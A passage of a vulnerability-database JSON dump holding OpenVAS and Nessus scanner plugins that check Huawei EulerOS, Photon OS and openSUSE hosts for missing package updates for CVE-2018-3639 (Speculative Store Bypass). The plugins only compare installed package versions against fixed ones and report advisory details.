exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.62.59.83.h96\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-01-27T18:36:29", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181271", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181271", "title": "Huawei EulerOS: Security Advisory for kvm (EulerOS-SA-2018-1271)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1271\");\n script_version(\"2020-01-23T11:19:41+0000\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:19:41 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:19:41 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kvm (EulerOS-SA-2018-1271)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1271\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1271\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kvm' package(s) announced via the EulerOS-SA-2018-1271 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.(CVE-2018-3639)\");\n\n script_tag(name:\"affected\", value:\"'kvm' package(s) on Huawei EulerOS Virtualization 2.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kvm\", rpm:\"kvm~4.4.11~421\", rls:\"EULEROSVIRT-2.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "nessus": [{"lastseen": "2019-02-21T01:41:15", "bulletinFamily": "scanner", "description": "An update of {'linux', 'linux-esx'} packages of Photon OS has been released. This kernel update mitigates vulnerability CVE-2018-3639 which is referred to as Speculative Store Bypass issue", "modified": "2019-02-07T00:00:00", "id": "PHOTONOS_PHSA-2018-1_0-0151.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111277", "published": "2018-07-24T00:00:00", "title": "Photon OS 1.0 : linux / linux-esx (PhotonOS-PHSA-2018-1.0-0151) (Spectre) (deprecated)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0151. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111277);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_bugtraq_id(104232);\n\n script_name(english:\"Photon OS 1.0 : linux / linux-esx (PhotonOS-PHSA-2018-1.0-0151) (Spectre) (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of {'linux', 'linux-esx'} packages of Photon OS has been\nreleased. This kernel update mitigates vulnerability CVE-2018-3639\nwhich is referred to as Speculative Store Bypass issue\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-151\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8e002ec9\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-3639\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.137-2.ph1\",\n \"linux-debuginfo-4.4.137-2.ph1\",\n \"linux-dev-4.4.137-2.ph1\",\n \"linux-docs-4.4.137-2.ph1\",\n \"linux-drivers-gpu-4.4.137-2.ph1\",\n \"linux-esx-4.4.137-2.ph1\",\n \"linux-esx-4.4.137-2.ph1\",\n \"linux-esx-debuginfo-4.4.137-2.ph1\",\n \"linux-esx-debuginfo-4.4.137-2.ph1\",\n \"linux-esx-devel-4.4.137-2.ph1\",\n \"linux-esx-devel-4.4.137-2.ph1\",\n \"linux-esx-docs-4.4.137-2.ph1\",\n \"linux-esx-docs-4.4.137-2.ph1\",\n \"linux-oprofile-4.4.137-2.ph1\",\n \"linux-sound-4.4.137-2.ph1\",\n \"linux-tools-4.4.137-2.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2020-02-01T01:23:57", "bulletinFamily": "scanner", "description": "This update for libvirt fixes the following issues :\n\nThis update fixes the following security issue :\n\n - Added support for ", "modified": "2020-02-02T00:00:00", "id": "OPENSUSE-2019-424.NASL", "href": "https://www.tenable.com/plugins/nessus/123185", "published": "2019-03-27T00:00:00", "title": "openSUSE Security Update : libvirt (openSUSE-2019-424) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-424.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123185);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"openSUSE Security Update : libvirt (openSUSE-2019-424) (Spectre)\");\n script_summary(english:\"Check for the openSUSE-2019-424 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libvirt fixes the following issues :\n\nThis update fixes the following security issue :\n\n - Added support for 'ssbd' and 'virt-ssbd' CPUID feature\n bits (CVE-2018-3639, boo#1092885)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvirt packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-admin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-config-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-config-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-interface\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-interface-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-libxl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-libxl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-lxc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-network-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nodedev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nodedev-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-nwfilter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-qemu-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-secret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-secret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-disk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-disk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-iscsi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-logical\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-logical-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-mpath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-mpath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-scsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-storage-scsi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-uml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-uml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-vbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-driver-vbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-hooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-uml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-vbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-daemon-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-lock-sanlock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-lock-sanlock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libvirt-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-plugin-libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:wireshark-plugin-libvirt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-admin-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-admin-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-client-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-client-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-config-network-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-config-nwfilter-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-interface-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-interface-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-lxc-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-lxc-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-network-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-network-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-nodedev-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-nodedev-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-nwfilter-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-nwfilter-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-qemu-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-qemu-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-secret-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-secret-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-core-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-core-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-disk-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-disk-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-iscsi-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-iscsi-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-logical-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-logical-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-mpath-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-mpath-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-scsi-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-storage-scsi-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-uml-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-uml-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-vbox-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-driver-vbox-debuginfo-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-hooks-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-lxc-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-qemu-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-uml-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-daemon-vbox-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-debugsource-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-devel-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libvirt-libs-4.0.0-lp150.7.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 